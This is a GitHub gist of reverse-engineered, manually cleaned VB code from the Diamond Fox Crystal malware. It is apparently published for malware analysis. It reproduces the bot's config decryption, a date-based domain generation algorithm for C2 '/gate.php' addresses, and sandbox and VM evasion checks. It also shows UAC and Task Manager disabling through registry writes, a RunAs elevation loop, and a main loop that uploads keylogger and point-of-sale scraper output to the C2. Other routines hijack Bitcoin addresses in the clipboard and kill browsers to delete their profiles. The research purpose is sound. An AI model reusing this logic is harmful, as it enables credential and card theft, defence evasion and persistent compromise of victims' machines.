Skip to content

Instantly share code, notes, and snippets.

@hasherezade

hasherezade/Module1.vb Secret

Last active April 5, 2017 23:17
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hasherezade/79de1509c8565ec7496cd554092df6f8 to your computer and use it in GitHub Desktop.
Save hasherezade/79de1509c8565ec7496cd554092df6f8 to your computer and use it in GitHub Desktop.
Download ZIP
Diamond Fox Crystal, main module
Raw
decrypt.vb
'cleaned version of the decrypting function from Module1.vb
Public Sub decrypt(str1_arg, str2_arg) '406ABC
'Data Table: 401634
Dim s2_bound As Long
Dim i1 As Integer
Dim i1 As Long
Dim k1 As Long
On Error Resume Next
str1 = StrConv(str1_arg, &H80, 0)
str2 = StrConv(str2_arg, &H80, 0)
s2_bound = UBound(str2, 1)
For index1 = 0 To &HFF: _indx = index1 'Long
karr(_indx ) = CInt(_indx )
Next index1 'Long
For var_F4 = &H100 To &H11D: _indx = var_F4 'Long
karr(_indx ) = CInt(_indx Xor &H100)
Next var_F4 'Long
For var_FC = 1 To 6: _indx = var_FC 'Long
karr((_indx + &HF9)) = CInt(str2((s2_bound - _indx )))
karr((_indx - 1)) = CInt(str2((_indx - 1))) Xor (255 - CInt(str2((s2_bound - _indx ))))
Next var_FC 'Long
i1 = 0
k1 = 0
For index = 0 To UBound(str1, 1): _indx = index 'Long
If (0 > s2_bound) Then
j1 = 0
End If
If ((k1 > &H11D) And (i1 = 0)) Then
k1 = 0
i1 = Not(i1)
End If
If ((k1 > &H11D) And (i1 = &HFF)) Then
k1 = 5
i1 = Not(i1)
End If
str1(_indx) = CByte(CInt(str1(_indx)) Xor karr(k1) Xor CInt(str2(j1)))
j1 = (j1 + 1)
k1 = (k1 + 1)
Next index 'Long
loc_406AB2: result = CStr(StrConv(str1, &H40, 0))
loc_406ABA: Exit Sub
End Sub
Raw
domain_generate.vb
'cleaned version of the DGA from Module1.vb
Public Sub domain_generate(arg_C) '407084
'Data Table: 401634
Dim var_BC As Double
Dim var_AC As Long
Dim var_A8 As Double
Dim vDay As Single
Dim vMonth As Single
Dim vYear As Single
Dim arg_2008 As Variant
Dim var_9C As Long
On Error Resume Next
baseStr = Me(92) & Me(124)
var_BC = CDate(DateValue(Me(120)))
var_AC = CLng((DateValue(CStr(Now)) - CDate(var_BC)))
If (var_AC < 0) Then
Exit Sub
End
End If
var_A8 = CDate((var_BC + CDbl((var_AC - (var_AC Mod Me(116))))))
vDay = CDbl(Day(CDate(CDate((var_A8 + CDbl(arg_C))))))
vMonth = CDbl(Month(CDate(CDate((var_A8 + CDbl(arg_C))))))
vYear = CDbl(Year(CDate(CDate((var_A8 + CDbl(arg_C))))))
arg_2008 = Split(Me(148), "|", -1, 0)
ext = arg_2008((CLng(vMonth) Xor CLng(vDay) Mod UBound(arg_2008, 1)))
var_9C = (((CLng(vYear) And &HFF00) / &H100) * CLng((vDay * Tan(CDbl((CLng(vYear) And &HFF))))) Xor CLng(Cos((vMonth * CDbl(&HA)))))
var_9C = Abs(var_9C)
If CBool((var_9C Mod 2)) Then
var_9C = var_9C Xor (CLng(vYear) / CLng((vMonth * vDay)))
End If
For var_11C = 1 To Me(108): var_C4 = var_11C 'Long
domain_name = domain_name & Mid$(baseStr, Abs((((var_9C * var_C4 Xor CLng((CDbl(var_9C) / CDbl(2)))) Mod Len(baseStr)) - Len(baseStr))), 1)
Next var_11C 'Long
domain_name = "http://" & LCase$(domain_name & "." & ext) & "/gate.php"
Exit Sub
End Sub
Raw
Module1.vb
'Object: Module1
'(cleaned manually)
Public Sub main
'Data Table: 401634
Dim MemVar_40B3A4 As Global
Dim var_A8 As String
Dim var_94 As String
Dim var_118 As Long
Dim var_11C As Long
Dim var_F8 As Integer
Dim var_144 As String
Dim var_98 As String
loc_4096D4: On Error Resume Next
loc_4096E4: var_90 = MemVar_40B3A4.App
loc_4096EC: App.TaskVisible = False
loc_40970A: GetModuleFileName(0, var_8C, &HFF)
loc_409743: var_94 = var_98
loc_40974E: var_98 = Replace(var_94, vbNullString, 0, 1, -1, 0)
loc_409757: var_8C = var_94
loc_40975D: Me(88) = var_98
loc_409768: fetch_logical_disks(StrConv(var_98, vbUnicode))
loc_409787: If Not((Len(Proc_0_40_40628C("L!NK")) <> 0)) Then
loc_4097A1: Me.Global.LoadResData "L!NK", "1", var_C8
loc_4097D6: If Not((Len(CStr(StrConv(var_C8, &H40, 0))) <> 0)) Then
loc_40982E: var_88 = CStr(Split(file_binary_open(Me(88)), CVar(String$(&H16, "-")), -1, 0)(1))
loc_409845: End If
loc_409847: End If
loc_40985F: PARAMS_STORAGE = decrypt(var_88, Proc_0_19_404CD8(var_88))
loc_409877: If Not((Len(PARAMS_STORAGE) <> 0)) Then
loc_40987C: End
loc_40987E: End If
loc_409897: If CBool(load_param(7, 0)) Then
loc_4098A4: check_sandbox_dll(1)
loc_4098A9: End If
loc_4098C2: If CBool(load_param(8, 0)) Then
loc_4098CF: check_sandbox_dll(3)
loc_4098D4: End If
loc_4098ED: If CBool(load_param(6, 0)) Then
loc_4098FA: check_sandbox_dll(5)
loc_4098FF: End If
loc_409918: If CBool(load_param(9, 0)) Then
loc_409925: check_volume_serials(1)
loc_40992A: End If
loc_40993B: var_94 = load_param(&HA, 0)
loc_409943: If CBool(var_94) Then
loc_409948: Proc_0_2_404004(var_94)
loc_40994D: End If
loc_409966: If CBool(load_param(&HB)) Then
loc_409973: check_sandbox_dll(2)
loc_409978: End If
loc_409991: If CBool(load_param(&HC, 0)) Then
loc_40999E: check_volume_serials(2)
loc_4099A3: End If
loc_4099BC: If CBool(load_param(&HD, 0)) Then
loc_4099C9: check_volume_serials(3)
loc_4099CE: End If
loc_4099E7: If CBool(load_param(&HE, 0)) Then
loc_4099EC: delay_execution(0)
loc_4099F1: End If
loc_409A0A: If CBool(load_param(&H12)) Then
loc_409A17: check_sandbox_dll(4)
loc_409A1C: End If
loc_409A36: Me(92) = base64_decode(load_param(3, 0))
loc_409A46: var_118 = Me(104)
loc_409A5D: var_118(28) = load_param(&H15, &HFF)
loc_409A79: var_118(32) = load_param(&H16, &HFF)
loc_409A95: var_118(40) = load_param(&H24, &HFF)
loc_409AB3: var_118(58) = CBool(load_param(&H1A, 0))
loc_409AC7: init_globals(0, 0)
loc_409ADA: var_90 = Me.Global.App
loc_409AF7: If (App.EXEName = MY_APPNAME) Then
loc_409B08: If (MY_DIR = Me(40)) Then
loc_409B17: FileCopy Me(88), MY_APPNAME
loc_409B23: shell_execute(MY_APPNAME)
loc_409B2A: End
loc_409B2F: Else
loc_409B3D: If (Me(88) = MY_APPNAME) Then
loc_409B47: var_11C = Me(104)
loc_409B5E: var_11C(16) = load_param(0, &HFF)
loc_409B7B: var_11C(0) = CLng(load_param(1, &HFF))
loc_409B97: var_11C(20) = load_param(2, &HFF)
loc_409BB3: var_11C(24) = load_param(4, &HFF)
loc_409BCF: var_11C(36) = load_param(5, &HFF)
loc_409BED: var_11C(48) = CBool(load_param(&H17, 0))
loc_409C0B: var_11C(50) = CBool(load_param(&H18, 0))
loc_409C29: var_11C(52) = CBool(load_param(&H19, 0))
loc_409C47: var_11C(56) = CBool(load_param(&H22, 0))
loc_409C65: var_11C(54) = CBool(load_param(&H21, 0))
loc_409C83: var_11C(60) = CBool(load_param(&H13, 0))
loc_409CA1: var_11C(62) = CBool(load_param(&H1D, 0))
loc_409CBF: var_11C(66) = CBool(load_param(&H20, 0))
loc_409CCE: var_11C = 0
loc_409CDB: var_94 = Me(92)
loc_409CE9: CreateMutex(0, 1, var_94)
loc_409D05: Set var_90 = Err()
loc_409D0B: Call {A4C466B8-499F-101B-BB7800AA00383CBB}.Method_Proc_0_0_40A064C (var_114, StrConv(Me(92), vbUnicode), var_94)
loc_409D1C: If (var_114 = &HB7) Then
loc_409D21: End
loc_409D23: End If
loc_409D2F: SetAttr Me(88), 6
loc_409D40: SetAttr MY_DIR, 6
loc_409D5E: If CBool(load_param(&H14, 0, var_11C)) Then
loc_409D63: Proc_0_10_40655C(var_11C)
loc_409D6F: If Proc_0_30_4060D8(0) Then
loc_409D8C: modify_bot_install("1", 0)
loc_409D94: End If
loc_409D96: End If
loc_409D9F: If UnknownFunc(&HFF) Then
loc_409DBB: If CBool(load_param(&H10, 0)) Then
loc_409DD2: disable_tskmgr_regtools("1", "1")
loc_409DDE: End If
loc_409DF7: If CBool(load_param(&H11, 0)) Then
loc_409E0E: disable_tskmgr_regtools("0", "1")
loc_409E1A: End If
loc_409E21: Set var_124 = WSCRIPT_OBJ
loc_409E27: var_A8 = "HKLM\Software\Microsoft\Security Center\UACDisableNotify"
loc_409E2D: var_F8 = 0
loc_409E33: var_144 = "REG_DWORD"
loc_409E3C: Call var_124.RegWrite
loc_409E44: var_A8 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"
loc_409E4A: var_F8 = 0
loc_409E50: var_144 = "REG_DWORD"
loc_409E59: Call var_124.RegWrite
loc_409E63: Set var_124 = Nothing
loc_409E83: If (CBool(load_param(&H1E, 0, var_144, var_F8, var_A8)) = 0) Then
loc_409E98: write_to_file(OFF_C, 0, var_144)
loc_409EA0: End If
loc_409EA5: Else
loc_409EC0: If CBool(load_param(&HF, 0, var_F8)) Then
loc_409EC5: Proc_0_20_4054D4(var_A8)
loc_409ECA: End If
loc_409EDC: write_to_file(OFF_C, 0)
loc_409EE4: End If
loc_409EFF: If CBool(load_param(&H23, 0)) Then
loc_409F04: Proc_0_8_405EC0(0)
loc_409F09: End If
loc_409F22: If CBool(load_param(&H1F)) Then
loc_409F27: Proc_0_7_404894(0)
loc_409F2C: End If
loc_409F33: make_persistent(0)
loc_409F5F: If (get_attribute1(POS_PATH) Or (CBool(load_param(&H1C, 0)) = &HFF)) Then
loc_409F66: Me(168) = &HFF
loc_409F6B: End If
loc_409F7A: fingerprint_system(0)
loc_409F84: Proc_0_10_40655C()
loc_409F95: If get_attribute1(LOGNAME) Then
loc_409F9A: Proc_0_32_4051F0()
loc_409FA2: Else
loc_409FBD: If CBool(load_param(&H1B)) Then
loc_409FC2: Proc_0_31_4046A4(0)
loc_409FC7: End If
loc_409FC9: End If
loc_409FD2: If Me(170) Then
loc_409FDC: var_94 = 0
loc_409FEA: Proc_0_29_4059BC(&HB)
loc_409FF2: End If
loc_409FF4: Proc_0_30_4060D8(var_94)
loc_409FF9: ' Referenced from: 40A010
loc_409FFD: If &HFF Then
loc_40A002: Proc_0_1_4087AC()
loc_40A009: DoEvents()
loc_40A010: GoTo loc_409FF9
loc_40A013: End If
loc_40A013: End If
loc_40A013: End If
loc_40A018: Else
loc_40A031: MkDir Me(52) & Me(144) & "\"
loc_40A057: modify_bot_install("1", &HFF)
loc_40A05F: End If
loc_40A063: Exit Sub
End Sub
Public Sub Proc_0_1_4087AC
'Data Table: 401634
Dim MemVar_402104.global_0 As Long
Dim var_90 As String
Dim MemVar_402104.global_20 As Long
Dim clipboard As Clipboard
Dim MemVar_402104.global_16 As Long
Dim MemVar_402104.global_4 As Long
Dim MemVar_402104.global_8 As Long
Dim MemVar_402104.global_12 As Long
Dim MemVar_402104.global_24 As Long
loc_40837C: On Error Resume Next
loc_408394: MemVar_402104.global_0 = (MemVar_402104.global_0 + 1)
loc_4083A7: If (MemVar_402104.global_0 = Me(104)) Then
loc_4083AC: cnc_post_and_read(MemVar_402104.global_0)
loc_4083BE: If Not(get_attribute1(OFF_C)) Then
loc_4083D3: var_88 = MY_DOMAIN & "?u=" & "1"
loc_4083E5: UnknownFunc(var_88)
loc_408409: var_8C = process_data(var_88, &HFF, 0)
loc_408418: var_90 = file_binary_open(HOSTS_PATH, StrConv(var_88, vbUnicode))
loc_408423: If (var_90 <> var_8C) Then
loc_408430: write_to_file(HOSTS_PATH, var_8C)
loc_408435: End If
loc_408437: End If
loc_40844E: If (MemVar_402104.global_20 <> FileLen(KEYS_C)) Then
loc_408462: MemVar_402104.global_20 = FileLen(KEYS_C)
loc_408488: post_content(KEYS_C, Proc_0_49_404F40(7, MemVar_402104.global_20))
loc_408494: End If
loc_4084A2: MemVar_402104.global_0 = 0
loc_4084A5: End If
loc_4084AE: Sleep(&H64)
loc_4084C1: If (Len(Me(140)) = &H22) Then
loc_4084DE: Me.Global.Clipboard.GetText var_B4
loc_4084E6: var_A0 = var_90
loc_4084F8: If (var_A0 <> Me(140)) Then
loc_408513: If ((AscW(var_A0) = &H31) And (Len(var_A0) = &H22)) Then
loc_408529: Set clipboard = Me.Global.Clipboard
loc_408531: clipboard.Clear
loc_408544: clipboard.SetText Me(140), var_B4
loc_40854D: Set clipboard = Nothing
loc_408551: End If
loc_408553: End If
loc_408555: End If
loc_40855E: Sleep(&H64)
loc_40856A: If Me(164) Then
loc_408582: MemVar_402104.global_16 = (MemVar_402104.global_16 + 1)
loc_408595: If (MemVar_402104.global_16 = &H1E) Then
loc_40859A: Proc_0_42_408E68(MemVar_402104.global_16, var_90, MemVar_402104.global_0)
loc_4085AB: MemVar_402104.global_16 = 0
loc_4085AE: End If
loc_4085B0: End If
loc_4085B9: Sleep(&H64)
loc_4085C5: If Me(166) Then
loc_4085DD: MemVar_402104.global_4 = (MemVar_402104.global_4 + 1)
loc_4085F0: If (MemVar_402104.global_4 = &H1E) Then
loc_408608: Proc_0_29_4059BC(6, 0, MemVar_402104.global_4)
loc_40861C: MemVar_402104.global_4 = 0
loc_40861F: End If
loc_408621: End If
loc_40862A: Sleep(&H64)
loc_408636: If Me(170) Then
loc_40864E: MemVar_402104.global_8 = (MemVar_402104.global_8 + 1)
loc_408661: If (MemVar_402104.global_8 = &H1E) Then
loc_40866B: make_persistent(&HFF, MemVar_402104.global_8, MemVar_402104.global_4)
loc_40867C: MemVar_402104.global_8 = 0
loc_40867F: End If
loc_408681: End If
loc_40868A: Sleep(&H64)
loc_408699: If (Me(168) = &HFF) Then
loc_4086AB: If (get_attribute1(POS_PATH, MemVar_402104.global_8, MemVar_402104.global_16) = &HFF) Then
loc_4086C3: MemVar_402104.global_12 = (MemVar_402104.global_12 + 1)
loc_4086D6: If (MemVar_402104.global_12 = &H1A4) Then
loc_4086E0: kill_task(POS_EXE, MemVar_402104.global_12)
loc_4086FA: If (MemVar_402104.global_24 <> FileLen(OUTPUT_TXT)) Then
loc_40870E: MemVar_402104.global_24 = FileLen(OUTPUT_TXT)
loc_408734: post_content(OUTPUT_TXT, Proc_0_49_404F40(8, MemVar_402104.global_24), 0)
loc_408740: End If
loc_408749: shell_execute(POS_PATH, 0)
loc_40875A: MemVar_402104.global_12 = 0
loc_40875D: End If
loc_408762: Else
loc_408788: process_and_write_to_file(MY_DOMAIN & "?p=" & CStr(&HD), POS_PATH, &HFF)
loc_408796: End If
loc_408798: End If
loc_4087A1: Sleep(&H1F4)
loc_4087A8: Exit Sub
End Sub
Public Sub Proc_0_2_404004
'Data Table: 401634
loc_403FD4: On Error Resume Next
loc_403FE2: UnknownFunc(var_9C(0))
loc_403FFA: If CBool((var_9C(&HB) And &H80)) Then
loc_403FFF: End
loc_404001: End If
loc_404003: Exit Sub
End Sub
Public Sub delay_execution
'Data Table: 401634
loc_403C90: On Error Resume Next
loc_403C95: Do 'loop at: 403CBC
loc_403CA6: Sleep(&H1F4)
loc_403CBC: Loop Until Not ((GetTickCount(GetTickCount()) - GetTickCount()) < &H1F4) 'do at: 403C95
loc_403CC1: Exit Sub
End Sub
Public Sub check_sandbox_dll(arg_C) '40479C
'Data Table: 401634
Dim var_8C As Long
loc_4046E4: On Error Resume Next
loc_4046EC: var_8C = arg_C
loc_4046FA: If (var_8C = 1) Then
loc_404702: var_88 = "vboxmrxnp"
loc_404708: Else
loc_404713: If (var_8C = 2) Then
loc_40471B: var_88 = "SbieDll"
loc_404721: Else
loc_40472C: If (var_8C = 3) Then
loc_404734: var_88 = "vmGuestLib"
loc_40473A: Else
loc_404745: If (var_8C = 4) Then
loc_40474D: var_88 = "snxhk"
loc_404753: Else
loc_40475E: If (var_8C = 5) Then
loc_404766: var_88 = "pthreadVC"
loc_404769: End If
loc_404769: End If
loc_404769: End If
loc_404769: End If
loc_404769: End If
loc_404790: If (UnknownFunc(var_88 & ".dll") <> 0) Then
loc_404795: End
loc_404797: End If
loc_404799: Exit Sub
End Sub
Public Sub check_volume_serials(index) '4041F8
'Data Table: 401634
Dim _index As Long
loc_40418C: On Error Resume Next
loc_404194: _index = index
loc_4041A2: If (_index = 1) Then
loc_4041AA: var_88 = "AC79B241"
loc_4041B0: Else
loc_4041BB: If (_index = 2) Then
loc_4041C3: var_88 = "70144646"
loc_4041C9: Else
loc_4041D4: If (_index = 3) Then
loc_4041DC: var_88 = "6C78A9C3"
loc_4041DF: End If
loc_4041DF: End If
loc_4041DF: End If
loc_4041ED: If (VOL_SERIAL = var_88) Then
loc_4041F2: End
loc_4041F4: End If
loc_4041F6: Exit Sub
End Sub
Public Sub disable_tskmgr_regtools(arg_C) '404294
'Data Table: 401634
Dim var_A0 As Variant
Dim var_D0 As String
loc_404230: On Error Resume Next
loc_40423D: If (arg_C = "1") Then
loc_404245: var_88 = "RegistryTools"
loc_40424B: Else
loc_404250: var_88 = "TaskMgr"
loc_404253: End If
loc_40426A: var_A0 = CVar("HKCU" & "\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disable" & var_88) 'String
loc_404275: var_D0 = "REG_DWORD"
loc_404280: Call MemVar_402104.RegWrite
loc_404292: Exit Sub
End Sub
Public Sub Proc_0_7_404894
'Data Table: 401634
loc_4047DC: On Error Resume Next
loc_4047EC: kill_task("Chrome.exe")
loc_404801: kill_task("firefox.exe")
loc_40483F: Proc_0_14_403F14(Environ$("LOCALAPPDATA") & "\Google\Chrome\User Data")
loc_404868: Proc_0_14_403F14(APPDATA_DIR & "Mozilla\Firefox\Profiles", &HFF)
loc_404885: Kill CVar(APPDATA_DIR & "Mozilla\Firefox\Profiles.ini")
loc_404892: Exit Sub
End Sub
Public Sub Proc_0_8_405EC0
'Data Table: 401634
loc_405D80: On Error Resume Next
loc_405D92: var_A0(0) = APPDATA_DIR
loc_405DA2: var_A0(1) = TEMP_DIR
loc_405DB2: var_A0(2) = Me(40)
loc_405DBE: kill_task("wscript.exe")
loc_405DD5: For var_B8 = 0 To 2: var_AC = var_B8 'Long
loc_405DED: LateMemCallLdVar
loc_405DF5: CAdVar
loc_405E08: CAdVar
loc_405E14: For Each var_A8 In MemVar_402104.Files
loc_405E63: If CBool(InStr(1, var_A8.Name, ".exe", 0) Or InStr(1, var_A8.Name, ".vbs", 0)) Then
loc_405E6D: Sleep(&H1F4)
loc_405E8A: Kill CVar(var_A0(var_AC)) & var_A8.Name
loc_405E96: End If
loc_405E9D: Next
loc_405EA8: Next var_B8 'Long
loc_405EB1: Set var_88 = Nothing
loc_405EB9: Set var_A8 = Nothing
loc_405EBF: Exit Sub
End Sub
Public Sub Proc_0_9_4040BC
'Data Table: 401634
loc_40406B: If Not(get_attribute1(OFF_C)) Then
loc_404075: var_88 = "&x=1"
loc_404078: End If
loc_404082: If get_attribute1(POS_PATH) Then
loc_404093: var_88 = var_88 & "&y=1"
loc_404099: End If
loc_4040A3: If get_attribute1(LOGNAME) Then
loc_4040B4: var_88 = var_88 & "&z=1"
loc_4040BA: End If
loc_4040BA: Exit Sub
End Sub
Public Sub Proc_0_10_40655C
'Data Table: 401634
Dim var_94 As Long
Dim arg_2008 As Variant
loc_406350: On Error Resume Next
loc_406361: If (Len(Me(120)) < &HB) Then
loc_40636B: var_94 = Me(104)
loc_406382: var_94(44) = load_param(&H25, &HFF)
loc_40639F: var_94(4) = CLng(load_param(&H26, &HFF))
loc_4063BC: var_94(8) = CLng(load_param(&H27, &HFF))
loc_4063D9: var_94(12) = CLng(load_param(&H28, &HFF))
loc_4063FA: For var_A8 = 0 To Me(112): var_90 = var_A8 'Long
loc_406411: var_A0 = 0 & domain_generate(var_90, var_A0, 0)
loc_406422: If (var_90 <> Me(112)) Then
loc_40642E: var_A0 = var_A0 & vbCrLf
loc_406431: End If
loc_406436: Next var_A8 'Long
loc_406460: arg_2008 = Split(var_A0, vbCrLf, -1, 0)
loc_40646A: var_8C = arg_2008
loc_406476: Else
loc_40649F: arg_2008 = Split(Me(120), vbCrLf, -1, 0)
loc_4064A9: var_8C = arg_2008
loc_4064B2: End If
loc_4064C5: For var_E4 = 0 To UBound(var_8C, 1): var_90 = var_E4 'Long
loc_4064D9: domain = Trim$(var_8C(var_90))
loc_4064F3: If ((domain <> 0) And (Len(domain) > &HA)) Then
loc_4064F8: test_connection_microsoft(0)
loc_40651C: If (process_data(domain, 0) = "OK") Then
loc_406524: MY_DOMAIN = domain
loc_40652B: cnc_post_and_read(0)
loc_406532: Exit For
loc_406535: End If
loc_406537: End If
loc_40653E: Next var_E4 'Long
loc_406543: ' Referenced from: 406532
loc_406551: If (MY_DOMAIN = 0) Then
loc_406556: End
loc_406558: End If
loc_40655A: Exit Sub
End Sub
Public Sub test_connection_microsoft
'Data Table: 401634
loc_403F4C: On Error Resume Next
loc_403F4F: ' Referenced from: 403F8F
loc_403F7E: If (UnknownFunc("http://www.microsoft.com") = 0) Then
loc_403F88: Sleep(&H2710)
loc_403F8F: GoTo loc_403F4F
loc_403F92: End If
loc_403F94: Exit Sub
End Sub
Public Sub domain_generate(arg_C) '407084
'Data Table: 401634
Dim var_BC As Double
Dim var_AC As Long
Dim var_A8 As Double
Dim var_90 As Single
Dim var_94 As Single
Dim var_98 As Single
Dim arg_2008 As Variant
Dim var_9C As Long
loc_406E18: On Error Resume Next
loc_406E28: var_C0 = Me(92) & Me(124)
loc_406E3F: var_BC = CDate(DateValue(Me(120)))
loc_406E6E: var_AC = CLng((DateValue(CStr(Now)) - CDate(var_BC)))
loc_406E86: If (var_AC < 0) Then
loc_406E8B: Exit Sub
loc_406E8E: End
loc_406E90: End If
loc_406EAD: var_A8 = CDate((var_BC + CDbl((var_AC - (var_AC Mod Me(116))))))
loc_406ECC: var_90 = CDbl(Day(CDate(CDate((var_A8 + CDbl(arg_C))))))
loc_406EF2: var_94 = CDbl(Month(CDate(CDate((var_A8 + CDbl(arg_C))))))
loc_406F18: var_98 = CDbl(Year(CDate(CDate((var_A8 + CDbl(arg_C))))))
loc_406F49: arg_2008 = Split(Me(148), "|", -1, 0)
loc_406F74: domain_ext = arg_2008((CLng(var_94) Xor CLng(var_90) Mod UBound(arg_2008, 1)))
loc_406FB6: var_9C = (((CLng(var_98) And &HFF00) / &H100) * CLng((var_90 * Tan(CDbl((CLng(var_98) And &HFF))))) Xor CLng(Cos((var_94 * CDbl(&HA)))))
loc_406FBF: var_9C = Abs(var_9C)
loc_406FCF: If CBool((var_9C Mod 2)) Then
loc_406FE6: var_9C = var_9C Xor (CLng(var_98) / CLng((var_94 * var_90)))
loc_406FE9: End If
loc_406FF8: For var_11C = 1 To Me(108): var_C4 = var_11C 'Long
loc_407039: domain_name = domain_name & Mid$(var_C0, Abs((((var_9C * var_C4 Xor CLng((CDbl(var_9C) / CDbl(2)))) Mod Len(var_C0)) - Len(var_C0))), 1)
loc_407047: Next var_11C 'Long
loc_407072: domain_name = "http://" & LCase$(domain_name & "." & domain_ext) & "/gate.php"
loc_407082: Exit Sub
End Sub
Public Sub get_attribute1(arg_C) '403BB4
'Data Table: 401634
loc_403B9C: On Error Resume Next
loc_403BB0: Result CBool(GetAttr(arg_C)) End Sub 'Integer
End Sub
Public Sub Proc_0_14_403F14
'Data Table: 401634
Dim var_86 As Integer
Dim var_B8 As Boolean
loc_403ED0: On Error Resume Next
loc_403EE1: LateMemCallLdVar
loc_403EEB: var_86 = CBool(MemVar_402104)
loc_403EF6: If arg_10 Then
loc_403F02: var_B8 = True
loc_403F0B: Call MemVar_402104.DeleteFolder
loc_403F11: End If
loc_403F13: Result var_B8 End Sub 'Integer
End Sub
Public Sub kill_task(arg_C) '403D28
'Data Table: 401634
On Error Resume Next
shell_execute("taskkill /IM " & LCase$(arg_C) & " /F ")
Exit Sub
End Sub
Public Sub decrypt(str1_arg, str2_arg) '406ABC
'Data Table: 401634
Dim var_AC As Long
Dim var_B6 As Integer
Dim var_B0 As Long
Dim var_B4 As Long
loc_406870: On Error Resume Next
loc_40689C: str1 = StrConv(str1_arg, &H80, 0)
loc_4068CA: str2 = StrConv(str2_arg, &H80, 0)
loc_4068D8: var_AC = UBound(str2, 1)
loc_4068EA: For index1 = 0 To &HFF: _indx = index1 'Long
loc_4068FC: var_A0(_indx ) = CInt(_indx )
loc_406902: Next index1 'Long
loc_406916: For var_F4 = &H100 To &H11D: _indx = var_F4 'Long
loc_40692F: var_A0(_indx ) = CInt(_indx Xor &H100)
loc_406935: Next var_F4 'Long
loc_406949: For var_FC = 1 To 6: _indx = var_FC 'Long
loc_40696B: var_A0((_indx + &HF9)) = CInt(str2((var_AC - _indx )))
loc_40699E: var_A0((_indx - 1)) = CInt(str2((_indx - 1))) Xor (255 - CInt(str2((var_AC - _indx ))))
loc_4069A4: Next var_FC 'Long
loc_4069AD: var_B6 = 0
loc_4069C1: var_B4 = 0
loc_4069D5: For var_104 = 0 To UBound(str1, 1): _indx = var_104 'Long
loc_4069E4: If (0 > var_AC) Then
loc_4069EE: var_B0 = 0
loc_4069F1: End If
loc_406A03: If ((var_B4 > &H11D) And (var_B6 = 0)) Then
loc_406A0D: var_B4 = 0
loc_406A16: var_B6 = Not(var_B6)
loc_406A19: End If
loc_406A2B: If ((var_B4 > &H11D) And (var_B6 = &HFF)) Then
loc_406A35: var_B4 = 5
loc_406A3E: var_B6 = Not(var_B6)
loc_406A41: End If
loc_406A6A: str1(_indx) = CByte(CInt(str1(_indx)) Xor var_A0(var_B4) Xor CInt(str2(var_B0)))
loc_406A77: var_B0 = (var_B0 + 1)
loc_406A85: var_B4 = (var_B4 + 1)
loc_406A8D: Next var_104 'Long
loc_406AB2: result = CStr(StrConv(str1, &H40, 0))
loc_406ABA: Exit Sub
End Sub
Public Sub base64_decode(arg_C) '404AA8
'Data Table: 401634
Dim var_B8 As Variant
loc_4049E8: On Error Resume Next
loc_404A0D: CAdVar
loc_404A1B: var_B8 = "b64"
loc_404A24: LateMemCallLdVar
loc_404A2C: CAdVar
loc_404A3A: Set var_CC = CreateObject(get_object_type(4), 0)
loc_404A49: var_CC.DataType = "bin.base64"
loc_404A59: var_CC.Text = CVar(arg_C)
loc_404A82: var_88 = CStr(StrConv(var_CC.nodeTypedValue, &H40, 0))
loc_404A90: Set var_CC = Nothing
loc_404A98: Set var_90 = Nothing
loc_404AA0: Set var_8C = Nothing
loc_404AA6: Exit Sub
End Sub
Public Sub Proc_0_18_405D30(arg_C) '405D30
'Data Table: 401634
Dim var_9C As Long
Dim rnd As Integer
Dim var_98 As Double
loc_405BBC: On Error Resume Next
loc_405BC4: Randomize(rnd)
loc_405BE1: var_9C = CLng(Int(((Rnd(rnd) * CDbl(&H63)) + CDbl(1))))
loc_405BF7: For var_C8 = 1 To Len(Me(124)): var_A0 = var_C8 'Long
loc_405C30: var_98 = (CDbl(Asc(Mid$(Me(124), var_A0, 1))) * Abs(Cos(Sqr(var_98))))
loc_405C3E: Next var_C8 'Long
loc_405C51: For var_DC = 1 To Len(arg_C): var_A0 = var_DC 'Long
loc_405C8B: var_8C = Chr$(CLng(Asc(Mid$(arg_C, var_A0, 1))) Xor CLng((CDbl(var_9C) + Int(var_98)))) & var_8C
loc_405C9D: Next var_DC 'Long
loc_405CB3: var_8C = Chr$(var_9C) & var_8C
loc_405CC7: For var_E8 = 1 To Len(var_8C): var_A0 = var_E8 'Long
loc_405D08: If (Len(Hex$(CVar(Asc(Mid$(var_8C, var_A0, 1))))) = 1) Then
loc_405D14: var_90 = "0" & var_90
loc_405D17: End If
loc_405D20: var_88 = var_88 & var_90
loc_405D28: Next var_E8 'Long
loc_405D2F: Exit Sub
End Sub
Public Sub Proc_0_19_404CD8(arg_C) '404CD8
'Data Table: 401634
loc_404C78: var_8C = CStr(Split(Str$(Round(CVar(Cos(Sqr(CDbl(Len(arg_C))))), &HF)), ".", -1, 0)(1))
loc_404C9B: For var_13C = 1 To Len(var_8C): var_94 = var_13C 'Long
loc_404CC2: var_88 = var_88 & CStr(Asc(Mid$(var_8C, var_94, 1)))
loc_404CD2: Next var_13C 'Long
loc_404CD7: Exit Sub
End Sub
Public Sub Proc_0_20_4054D4
'Data Table: 401634
Dim MemVar_40B3A4 As Global
Dim var_8A As Integer
Dim var_AC As Variant
Dim var_CC As Variant
Dim var_EC As Variant
Dim var_10C As String
Dim var_12C As Integer
loc_4053A0: On Error Resume Next
loc_4053B1: var_90 = MemVar_40B3A4.App
loc_4053CE: var_8A = Proc_0_21_404594(App.EXEName & ".exe")
loc_4053FD: CAdVar
loc_405414: var_AC = CVar(SYSTEM32_DIR & "cmd.exe") 'String
loc_40542F: var_CC = CVar("/c " & """" & Me(88) & """") 'String
loc_405438: var_EC = CVar(0) 'String
loc_40543C: var_10C = "RunAs"
loc_405442: var_12C = 0
loc_40544B: Call CreateObject(get_object_type(3, 0), var_8A).ShellExecute
loc_405463: Set var_88 = Nothing
loc_405467: ' Referenced from: 405482
loc_40547F: If (Proc_0_21_404594("consent" & ".exe", var_12C, var_10C) > 0) Then
loc_405482: GoTo loc_405467
loc_405485: End If
loc_405493: var_90 = MemVar_40B3A4.App
loc_4054BE: If (Proc_0_21_404594(App.EXEName & ".exe", var_EC) <= var_8A) Then
loc_4054C3: Proc_0_20_4054D4(var_CC)
loc_4054CB: Else
loc_4054CD: End
loc_4054CF: End If
loc_4054D1: Exit Sub
End Sub
Public Sub Proc_0_21_404594(arg_C) '404594
'Data Table: 401634
Dim var_104 As Variant
loc_40453D: var_104 = CVar("select * from " & "win32_" & "Process" & " where " & "Name" & "='" & arg_C & "'") 'String
